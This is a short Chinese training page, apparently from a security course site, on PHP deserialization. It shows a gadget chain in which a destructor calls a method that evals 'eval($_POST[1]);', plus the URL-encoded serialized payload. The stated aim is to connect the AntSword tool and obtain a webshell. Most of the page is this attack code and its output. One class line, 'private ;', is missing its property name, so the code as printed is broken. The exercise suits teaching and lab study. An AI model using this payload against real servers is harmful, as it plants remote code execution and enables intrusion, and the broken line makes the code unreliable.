序列化漏洞-链接蚁剑,获得webshell

接收端PHP源码如下:
一个序列化的例子代码:
class One {
    private ;
    function __construct() {
        $this->test = new Good();
    }
    function __destruct() {
        $this->test->action();
    }
}

class Good {
    var $test2 = 'eval($_POST[1]);';
    function action() {
        eval($this->test2);
    }
}
echo urlencode(serialize(new One()));
     
输出结果为:
O%3A3%3A%22One%22%3A1%3A%7Bs%3A9%3A%22%00One%00test%22%3BO%3A4%3A%22Good%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A16%3A%22eval%28%24_POST%5B1%5D%29%3B%22%3B%7D%7D
#请构造反序列化字符串,蚁剑链接,获得webshell
© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2  
本站一切信息皆遵守中华人民共和国法律,如发现任何不良信息,请拨打电话:18622800700
网络安全培训、企业合作、院校合作: 15320004362(手机同微信)